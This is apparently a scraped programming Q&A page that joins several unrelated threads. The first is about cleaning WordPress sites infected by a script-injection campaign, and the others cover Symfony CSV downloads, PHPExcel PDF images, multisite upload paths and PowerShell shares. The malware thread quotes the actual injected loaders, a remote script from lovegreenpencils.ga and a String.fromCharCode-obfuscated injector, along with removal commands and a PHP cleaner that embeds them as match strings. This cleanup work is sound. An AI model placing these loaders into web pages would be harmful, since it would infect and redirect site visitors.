Develop Reference

Wordpress website infected by virus; how to backup or recover?

My WordPress websites are infected with malicious code. What can I do to regain data or backup? Websites are showing blank page or redirect to some malicious URL. The below code (and similar) were injected in many pages (also many files with different names were created) :
<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>
 
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
Some of my infected websites (warning: visiting may infect) :
https://lahuriyaconstruction.com/
https://getnonveg.com/

Same here - open your database in phpmyadmin and enter the following in SQL box:
UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'
It will clean all posts from the script, but you have to look where the entries come from.

I have faced this issue with more than 5 WordPress websites,
I fixed it by replacing all dock.lovegreenpencils.ga links with "#" to make it point to nowhere.
1 . Run this command inside your WordPress directory
grep -r "lovegreenpencils" .
You should be able to see all files that are infected:
Replace all links using this command
find . -name "*.php" |xargs sed -i "s/https:\/\/dock.lovegreenpencils.ga\/m.js?n=ns1/#/g"
It will replace all matched scripts with "#"
Clean any script added to your WP content
UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'
Links could end with m.js?n=nb5 or m.js?n=ns1 don't forget to remove both.
UPDATE:
THIS Milcouse code Also generates the script URLs from charCode In order not to be searchable.
String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115)
Make sure to get rid of it as well.
The above steps brought my website back to work.

There are a few things you can do to clean your Wordpress sites:
1- Visually check your public_html folder where your Wordpress is installed. You may see strange filenames in your root folder as well as wp-includes, wp-content or wp-admin folders and subfolders.
2- Check if any code injected into index.php (inside root folder) and wp-config.php
3- Install Wordfence plugin and do a manual scan. It will go through your wordpress installation, plugins and theme files and report anything unusual.
4- After all these, using Chrome Developer Tools' network tab, refresh your page and check if there are connections to malicious-looking urls.

Here is the script I created to clear the infected files on my sites...
Hopefully it helps. This is all I can do for you...
As mentioned you also have to remove the crap in post_content from wp_posts with the following SQL:
UPDATE wp_posts SET post_content = REPLACE(post_content,"",'') WHERE post_content LIKE '%lovegreenpencils%'
and add back in your domain url in the siteurl/home option under wp_options.
Save the following code into a php file and change the settings to get it to work on your system.
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('memory_limit',"256M");
ob_implicit_flush(1);
ob_start();
$backup_dir = "/var/badfiles";
$html_dir = "/var/www";
if(!is_dir($backup_dir)) mkdir($backup_dir);
$dir_iterator = new RecursiveDirectoryIterator($html_dir);
$iterator = new RecursiveIteratorIterator($dir_iterator, RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $file) {
if($file == __FILE__) continue;
if (pathinfo($file, PATHINFO_FILENAME) == "wp-beckup") {
backup_file($file);
if(unlink($file)) {
echo "[LGP Found]: Removed and Backed Up ({$file})<br>";
}
}
if (pathinfo($file, PATHINFO_FILENAME) == "lte_") {
backup_file($file);
if(unlink($file)) {
echo "[LGP Found]: Removed and Backed Up ({$file})<br>";
}
}
$bad_text = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (pathinfo($file, PATHINFO_EXTENSION) == "php" ) {
$contents = file_get_contents($file);
if(strpos($contents, $bad_text) !== false) {
backup_file($file);
$contents = str_replace($bad_text, '', $contents);
file_put_contents($file, $contents);
echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}
if (pathinfo($file, PATHINFO_EXTENSION) == "php" || pathinfo($file, PATHINFO_EXTENSION) == "html") {
$bad_text = "<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>";
$contents = file_get_contents($file);
if(strpos($contents, $bad_text) !== false) {
backup_file($file);
$contents = str_replace($bad_text, '', $contents);
file_put_contents($file, $contents);
echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}
$bad_text = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
if (pathinfo($file, PATHINFO_EXTENSION) == "jshintrc" || pathinfo($file, PATHINFO_EXTENSION) == "map" || pathinfo($file, PATHINFO_EXTENSION) == "jsx" || pathinfo($file, PATHINFO_EXTENSION) == "php" || pathinfo($file, PATHINFO_EXTENSION) == "js" || pathinfo($file, PATHINFO_EXTENSION) == "gz" || pathinfo($file, PATHINFO_EXTENSION) == "json") {
$contents = file_get_contents($file);
if(strpos($contents, $bad_text) !== false) {
backup_file($file);
$contents = str_replace($bad_text, '', $contents);
file_put_contents($file, $contents);
echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}
if (pathinfo($file, PATHINFO_FILENAME) == "wp-blog-header" && pathinfo($file, PATHINFO_EXTENSION) == "php") {
$contents = file_get_contents($file);
if(strpos($contents, 'MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=') !== false) {
backup_file($file);
$contents = substr($contents, strpos($contents, "cGFnZV9ub3RfZm91bmRfNDA0")+32);
file_put_contents($file, $contents);
echo "[VCD Found]: Code Removed and Backed Up ({$file})<br>";
}
}
}
function backup_file($file) {
global $backup_dir;
$contents = file_get_contents($file);
if(!is_dir(dirname($backup_dir.$file))) {
mkdir(dirname($backup_dir.$file),0777,true);
}
file_put_contents($backup_dir.$file, $contents);
}
DON'T FORGET TO BACKUP!!

I encountered this malware and wrote a script to clean it. Here's the link to that: https://gist.github.com/black-dragon74/86fc18a91e814019228c02531f0ea01c
Please note, this malware also spreads itself to the DB. To clean the DB, the regex is at the top of the file. Or you can just run: perl -pi.bak -e "s/<script[\s\S]*?>[\s\S]*?<\/script>//g" infected_db.sql
Also, If you get to know of any other URLs that it is maliciously injecting, please let me know, I'll update the script to include that.
Regards

in my case, it was had lots of code I have copied all code from post_content column from wp_post or your table name and replace with all.
UPDATE wplm_posts SET post_content = REPLACE(post_content,"{{{WITHOUT BRACKET -- Your code here that is in Column Post_content}}}",'') WHERE post_content LIKE '%lovegreenpencils%'
in my case my code in post_content column was:
<script src='https://port.lovegreenpencils.ga/m.js?n=ns1' type='text/javascript'></script><script src='https://trend.linetoadsactive.com/m.js?n=ns1' type='text/javascript'></script><script src='https://start.transandfiestas.ga/m.js?n=ns1' type='text/javascript'></script>
This code is worked to me.
UPDATE wplm_posts SET post_content = REPLACE(post_content,"<script src='https://port.lovegreenpencils.ga/m.js?n=ns1' type='text/javascript'></script><script src='https://trend.linetoadsactive.com/m.js?n=ns1' type='text/javascript'></script><script src='https://start.transandfiestas.ga/m.js?n=ns1' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'

Download file does not exist

I build a csv export using the admin folder. The file is well uploaded into my public folder.
But when I try to download it using the return, I have an error:
The file "/public/exportCSV.csv" does not exist
I can't understand why, I hope you have an idea. Thanks. I'm under Symfony 4.
$admins = $userRepository->findByRole(User::ROLE_ADMIN);
$filename='exportCSV';
$extension='csv';
$request = Request::createFromGlobals();
if($request->query->get('exportCSV')!= null){
$output = fopen($filename.'.'.$extension, 'w');
fputcsv($output, array("Id","Nom","Prénom","Activé","Dernière connexion","Date d'inscription","Url avatar","Email","Username"));
foreach ($admins as $admin){
$id=$admin->getId();
$lastname=$admin->getLastName();
$firstname=$admin->getFirstName();
$activeState=$admin->getActiveState();
if($activeState){
$active='Oui';
}else{
$active='Non';
}
$lastConnectedAt=$admin->getLastConnected();
if($lastConnectedAt==null){
$lastConnected=" ";
}else{
$lastConnected=$lastConnectedAt->format('Y-m-d H:i:s');
}
$createdAt=$admin->getCreatedAt();
if($createdAt==null){
$created=" ";
}else{
$created=$createdAt->format('Y-m-d H:i:s');
}
$urlAvatar=$admin->getUrlAvatar();
$mail=$admin->getEmail();
$username=$admin->getUsername();
$csvLine= array($id,$lastname,$firstname,$active,$lastConnected,$created,$urlAvatar,$mail,$username);
fputcsv($output,$csvLine);
}
return $this->file('/public/'.$filename.'.'.$extension);
}

You must use the correct path to webserver "public" dir. Check https://stackoverflow.com/a/48585423/3497902
In your example, you can do same like ...
$publicDir = $this->getParameter('kernel.project_dir') . '/public/'; # Your controller must extend AbstractController
$output = fopen($publicDir . $filename.'.'.$extension, 'w');

PHP - Excel renders PDF without image

I'm developing with the yii2 framework. I need to render some reports which should have some images. Everything is working in my excel file. But in PDF there are no images.
What I have in excel:
What I have in PDF:
My test code looks like this:
public function run($format = self::EXCEL) {
$this->format = $format;
if ($this->format == self::PDF) {
$rendererName = \PHPExcel_Settings::PDF_RENDERER_MPDF;
$rendererLibraryPath = Yii::getAlias('#vendor/mpdf/mpdf/');
if (!\PHPExcel_Settings::setPdfRenderer($rendererName, $rendererLibraryPath)) {
throw new BadRequestHttpException('Export pdf fail');
}
$this->headerContentType .= 'pdf';
$this->headerFilename .= date('d_m_Y') . '.pdf';
} elseif ($this->format == self::EXCEL) {
$this->headerContentType .= 'vnd.ms-excel';
$this->headerFilename .= date('d_m_Y') . '.xls';
} else {
throw new Exception('Unknown format for export');
}
$this->objPHPExcel->setActiveSheetIndex(0);
$activeSheet = $this->objPHPExcel->getActiveSheet();
$activeSheet->setTitle('Sample' . date('d_m_Y'));
$objDrawing = new PHPExcel_Worksheet_Drawing();
$objDrawing->setWorksheet($activeSheet);
$activeSheet->getColumnDimension('B')->setWidth(50);
$activeSheet->getRowDimension(2)->setRowHeight(80);
$activeSheet->setCellValue('A2','img -> ');
$activeSheet->setCellValue('B2',' ');
$objDrawing->setCoordinates('B'.2);
$objDrawing->setOffsetX(10)->setOffsetY(10);
$objDrawing->setName('Sample_image');
$objDrawing->setDescription('Sample_image');
$objDrawing->setPath('/home/vladimir/projects/temp/img.jpg');
$objDrawing->setWidth(50)->setHeight(50);
header($this->headerContentType);
header($this->headerFilename);
header('Cache-Control: max-age=0');
$objWriter = \PHPExcel_IOFactory::createWriter($this->objPHPExcel, $this->format);
$objWriter->save('php://output');
exit;
}

In this string:
$objDrawing->setPath('/home/vladimir/projects/temp/img.jpg');
I should write a relative path to "web" directory of my project and also I should have this image into "web" directory.
$objDrawing->setPath('img/img.jpg');
/path_to_project/web/img/img.jpg

I was stuck in CI3 and if you are using CI put the images folder outside of application folder and add path as
$objDrawing = new PHPExcel_Worksheet_Drawing();
$objDrawing->setName('Logo');
$objDrawing->setDescription('Logo');
$objDrawing->setPath('uploads/organizations/1.jpg');
$objDrawing->setHeight(36);
$objDrawing->setWorksheet($this->excel_reader_writer->getSheetByName($download_section));
The File Structure is
/- application
/- system
/- user_guide
/- uploads

Customize upload folder for sites

I´ve just installed a wordpress multisite installation (version 4.2.1) with mapped domains.
For each site the url for an uploaded image which is shown in the browser is http://URL/wp-content/uploads/sites/SITENUMBER/DATE/... and the folder is /path/to/wordpress/wp-content/uploads/sites/SITENUMBER/DATE/....
But I want to use the local path /path/to/wordpress/wp-content/uploads/sites/SITENUMBER/... and want to see in the browser http://URL/wp-content/uploads/DATE/... (like in a single wordpress site).
I´ve read a much about that and I think I know that the option "UPLOAD URL PATH" normally should rewrite this, doesn´t it? But for me it doesn´t work. How could I customize wordpress to fit it?
Update: I´ve found out that in functions.php are define that multisites will get a rewrite of the URL:
// If multisite (and if not the main site in a post-MU network)
if ( is_multisite() && ! ( is_main_network() && is_main_site() && defined( 'MULTISITE' ) ) ) {
if ( ! get_site_option( 'ms_files_rewriting' ) ) {
/*
* If ms-files rewriting is disabled (networks created post-3.5), it is fairly
* straightforward: Append sites/%d if we're not on the main site (for post-MU
* networks). (The extra directory prevents a four-digit ID from conflicting with
* a year-based directory for the main site. But if a MU-era network has disabled
* ms-files rewriting manually, they don't need the extra directory, as they never
* had wp-content/uploads for the main site.)
*/
if ( defined( 'MULTISITE' ) )
$ms_dir = '/sites/' . get_current_blog_id();
else
$ms_dir = '/' . get_current_blog_id();
$dir .= $ms_dir;
$url .= $ms_dir;
...
}}
But I didn´t know how I could change this to get the needed behavior.

Yes you can change your upload directory in WordPress using below function.
add_filter( 'upload_dir', 'upload_dir_filter' );
function upload_dir_filter( $upload ) {
$dir = $_SERVER['DOCUMENT_ROOT'];
$upload_dir = $dir['basedir'] . '/uploads/date';
$upload_url = $dir['baseurl'] . '/uploads/date';
wp_mkdir_p( $upload_dir ); //WordPress will check if the dir exists and can write to it.
$upload['path'] = $upload_dir;
$upload['url'] = $upload_url;
return $upload;
}

Powershell create share on current server - Grant permission to user/groups

I'm having no problem creating a share or assigning permissions, but I'm having a really difficult time actually accessing this fully. I'm the administrator on the server, I'm trying to test prepping the server for other users to access and I'm trying to set the permission, for now, to full access to everyone.
The issue is that when I try to create a new file/folder in the share I get access denied.
Does anyone else encounter this error when making shares through powershell?
Here is the code I have been using:
function New-Share
{
param (
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true, Mandatory=$true, HelpMessage="No folder name specified")]
[string]$FolderName,
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true, Mandatory=$true, HelpMessage="No share name specified")]
[string]$ShareName,
[parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true, Mandatory=$false, HelpMessage="No description specified")]
[string]$Description
)
$error.clear()
# Check for folder; Create it if it doesn't exist
If (!(Test-Path $FolderName))
{
New-Item $FolderName -type Directory | Out-Null
}
# Check for share; Create it if it doesn't exist
$Shares=[WMICLASS]"WIN32_Share"
if (!(Get-WMIObject Win32_share -filter "name='$ShareName'"))
{
$Shares.Create($FolderName,$ShareName,0,65535,$Description) | Out-Null
if (!($error))
{
# Share created
return $true
} else {
# Error
return $false
}
} else {
# Share Exists
return $false
}
}
I've been Invoking the function with this:
function bo.Share()
{
$domain = [Environment]::UserDomainName
$BDrive = "$boDrive" + ":\SYNintviewer"
New-Share -FolderName "$BDrive" -ShareName "SYNintviewer" -Description "SYNintviewer"
}

I actually got this working on my own...
Calling this function instead worked:
function bo.Share()
{
$domain = [Environment]::UserDomainName
$BDrive = "$boDrive" + ":\SYNintviewer"
echo "$boDrive is BoDRIVE"
echo "$BDrive is BDRIVE"
New-Share -Sharename "SYNintviewer" -Sharepath "$BDrive" -group "Authenticated Users" -auth FULL
}